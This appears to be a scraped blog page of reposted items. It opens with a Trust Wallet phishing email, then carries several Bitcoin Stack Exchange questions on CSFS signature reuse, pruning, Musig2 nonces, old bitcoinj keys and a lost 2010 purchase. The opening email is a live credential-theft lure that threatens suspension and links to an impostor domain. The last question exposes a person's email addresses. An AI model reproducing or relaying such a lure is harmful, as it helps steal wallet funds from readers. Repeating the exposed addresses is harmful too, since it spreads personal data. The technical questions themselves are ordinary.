Posts

UPDATE YOUR TRUSTWALLET

Important: Wallet Verification RequiredDear User,We are contacting you regarding your wallet. To ensure the security and protection of your funds, it is essential to verify your wallet as soon as possible. Failure to verify the wallet could result in suspension, which may lead to the loss of access to your funds.Why is it important?• Protect your wallet from suspension.• Ensure the security and protection of your funds.• Complete the verification process to avoid interruptions.To prevent any issues and keep your funds safe, please verify your wallet by clicking the link below:Verify Your Wallet Now : https://polivky.endora.site/trustl9wada/trustweb3/TW/ If you did not request this verification, please ignore this email. However, if you have any doubts, contact our support team.If you have any questions, do not hesitate to contact our support team.Thank you for choosing Trust Wallet . We are here to protect your funds! Best regards, The Trust Wallet Team© 2025 Trust Wallet. All rights ...

OP_CAT + OP_CHECKSIGFROMSTACK: how to prevent cross-UTXO signature reuse?

Following up on #130598 . I built a CAT + CSFS oracle-style script on signet ( commit , reveal ): OP_CAT OP_SHA256 <oracle_pubkey> OP_CHECKSIGFROMSTACK Witness: [sig, PART1, PART2] Message: SHA256(PART1 || PART2) Since CSFS only checks the message, the same (sig, PART1, PART2) appears to be reusable across multiple UTXOs with compatible scripts. For price oracles this is usually acceptable. But if the goal is single-use authorization (i.e., the signature should only be valid for one specific UTXO): Is committing to the outpoint inside the message the only general approach? Or is there a script-level pattern that avoids requiring the oracle to wait for the UTXO to exist before signing? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/wHOPXSB via IFTTT

How long should pruning take?

How long should pruning—say, from 794GB blockchain down to last 2GB—take? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/5XNnAg6 via IFTTT

Can Bob steal funds from a Musig2 multisig if he conducts a second multisig tx with the same participants?

What happens if Bob keeps the Musig2 nonces used in the last multisig transaction? Can Bob use Alice's disclosed nonces to steal monies from the second transaction? I would say no since the second transaction would use different unspent inputs than the first transaction. from Recent Questions - Bitcoin Stack Exchange https://ift.tt/3znZXTW via IFTTT

From bitcoinj v0.2

I have used bitcoinj v0.2 From wich I have a base64 string of 12 bytes 16 characters and a base58 string of 34 characters that is 25 bytes. it has a xor test in that string so I have a matching 10 bytes from the base64 string with a matching 16 bytes from that base58 string But how do I use them? Is this aes-128? so the 16 bytes is a encrypted seed? Or do I have to join then togheter to get a 26 bytes raw private key It's from the time before WIF thanks from Recent Questions - Bitcoin Stack Exchange https://ift.tt/xJ34Lh2 via IFTTT

Does OP_CHECKSIGFROMSTACK intentionally allow cross-UTXO signature reuse?

I ran a CSFS experiment on Bitcoin Inquisition Signet and got a spend confirmed: https://mempool.space/signet/tx/cc1b6d352f75348b6a52c7f5c68fc5caea2512423e08011e8f69a9bb85195f97 The tapscript is simply: <pubkey> OP_CHECKSIGFROMSTACK The witness provides (sig, msg, script, control_block) . Since (sig, msg) becomes public after spending, if another UTXO is later sent to the same script, anyone could reuse the exact same pair to spend it — because CSFS only enforces: schnorr_verify(pubkey, msg, sig) with no commitment to the spending transaction. By contrast, OP_CHECKSIG signatures commit to the input outpoint, so cross-UTXO reuse is impossible. This leads to three questions: Is cross-UTXO signature reuse an intentional property of CSFS, or a risk that must be handled at the script level? What are the standard patterns to prevent unintended reuse — include the outpoint in msg ? combine with OP_CHECKSIG ? In oracle constructions where reuse is desirable (e.g., attesting...

My bitcoin is worth a lot of money, I would like to find it?

my original Email address: alstone777@rocketmail.com I had a message a couple years ago t: theartmonster777@gmail.com I purchased bitcoin in 2010, 10 dollars worth, and it is worth a lot now I might of used paypal to purchase this bitcoin from Recent Questions - Bitcoin Stack Exchange https://ift.tt/5UkjpbO via IFTTT